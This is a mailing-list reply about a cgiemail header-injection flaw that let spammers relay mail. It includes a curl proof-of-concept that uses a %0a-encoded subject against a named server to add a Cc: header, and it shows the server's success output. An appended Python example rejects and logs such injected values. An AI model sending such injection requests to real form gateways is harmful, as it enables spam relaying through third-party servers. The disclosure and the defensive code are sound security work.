On Fri, Jan 23, 2004 at 01:12:48PM +0200, Ian Forbes wrote:

> I discovered this morning that our web server has been exploited for the
> relaying of spam. It has the latest "cgiemail" program distributed with
> Debian installed on it.
>
> First thing I did was disable the cgiemail executable to stop the flow
> of spam.
>
> Then I did some research. This is not a totally new scenario. After a
> little web searching I have found:
>
> 1) An open bug report:
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=222870

In that bug report, the maintainer claims that the bug is not reproducible
with cgiemail 1.6, but it seems to work for me:

mizar:[~] curl -d '[EMAIL PROTECTED]&subject=foobar%0aCc:[EMAIL PROTECTED]' http://sikuani.its.monash.edu.au/cgi-bin/cgiemail/template/test
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>The following email message was sent.<P><HR><PRE>
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: foobar
Cc: [EMAIL PROTECTED]

What is your name?
What is your quest?
What is your favourite colour?
</PRE><P>
<P><EM>cgiemail 1.6 </EM></BODY>

> 3) A patch which might fix the problem
> http://www.securityfocus.com/archive/1/340174

That patch is both in "normal" diff format, which makes it difficult to use
and read, and also seems to have been generated backwards, removing lines
when it should be adding them. I cannot judge its correctness, either, though
the description of the solution seems valid.

-- 
 - mdz
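The reproduction above works because cgiemail copies the submitted "subject" value into a header line without rejecting the newline that the URL-encoded %0a decodes to, so the remainder of the value becomes an extra Cc: header. The following is an added example, not cgiemail's code and not the patch linked on SecurityFocus, of the check a form-to-mail gateway needs: every submitter-controlled value that lands in a header is refused if it contains CR, LF or another control character, the recipient comes only from the template, and a helper lists the header names a rejected value would have smuggled in, for logging. The form field names (required-email, subject) and the addresses are constructed for the example.

```python
"""Rejecting CR/LF header injection in a form-to-mail CGI (added example).

Not cgiemail's code and not the Debian/SecurityFocus patch; the field names
and addresses are constructed for illustration.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs


class HeaderInjection(ValueError):
    """Raised when a form value would break out of its mail header line."""


# A header field body must stay on one logical line: no CR, no LF and no
# other C0 control character; horizontal tab (0x09) is left out because
# RFC 5322 allows it as folding whitespace.
_CONTROL = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")

# RFC 5322 field-name: printable ASCII except ':', followed by ':'.
_FIELD_NAME = re.compile(r"([!-9;-~]+):")


def check_header_value(name: str, value: str) -> str:
    """Return value unchanged if it is safe as one header line, else raise."""
    m = _CONTROL.search(value)
    if m:
        raise HeaderInjection(
            f"{name}: control character {m.group()!r} at offset {m.start()}")
    return value


def smuggled_headers(value: str) -> list[str]:
    """List the header names an unchecked value would append (for logging).

    Everything after the first line break is what the mail transport would
    read as further header lines; return the field names found there.
    """
    names = []
    for line in re.split(r"\r\n|\r|\n", value)[1:]:
        m = _FIELD_NAME.match(line)
        if m:
            names.append(m.group(1))
    return names


def build_message(post_body: str, fixed_to: str, body_lines: list[str]) -> str:
    """Build the outgoing message text from a URL-encoded form POST body.

    The To: address comes from the template configuration only, never from
    the form, and each submitter value used in a header is checked first.
    Raises HeaderInjection instead of sending when a value is unsafe.
    """
    form = parse_qs(post_body, keep_blank_values=True)  # decodes %0a to "\n"
    sender = check_header_value("From", form.get("required-email", [""])[0])
    subject = check_header_value("Subject", form.get("subject", [""])[0])
    headers = [f"From: {sender}", f"To: {fixed_to}", f"Subject: {subject}"]
    return "\n".join(headers) + "\n\n" + "\n".join(body_lines) + "\n"


if __name__ == "__main__":
    template_to = "form@example.com"          # constructed template recipient
    questions = ["What is your name?", "What is your quest?"]

    print(build_message("required-email=alice%40example.com&subject=hello",
                        template_to, questions))

    # The shape of the request from the thread, with constructed addresses.
    hostile = "required-email=alice%40example.com&subject=foobar%0aCc:bob%40example.com"
    try:
        build_message(hostile, template_to, questions)
    except HeaderInjection as exc:
        decoded = parse_qs(hostile)["subject"][0]
        print("rejected:", exc, "would have added:", smuggled_headers(decoded))
```

The check is deliberately a rejection rather than a strip: silently removing the line break would still deliver mail whose subject the submitter did not intend, and logging the refused value together with the header names from smuggled_headers() is what lets an operator notice the relay attempts that prompted this thread.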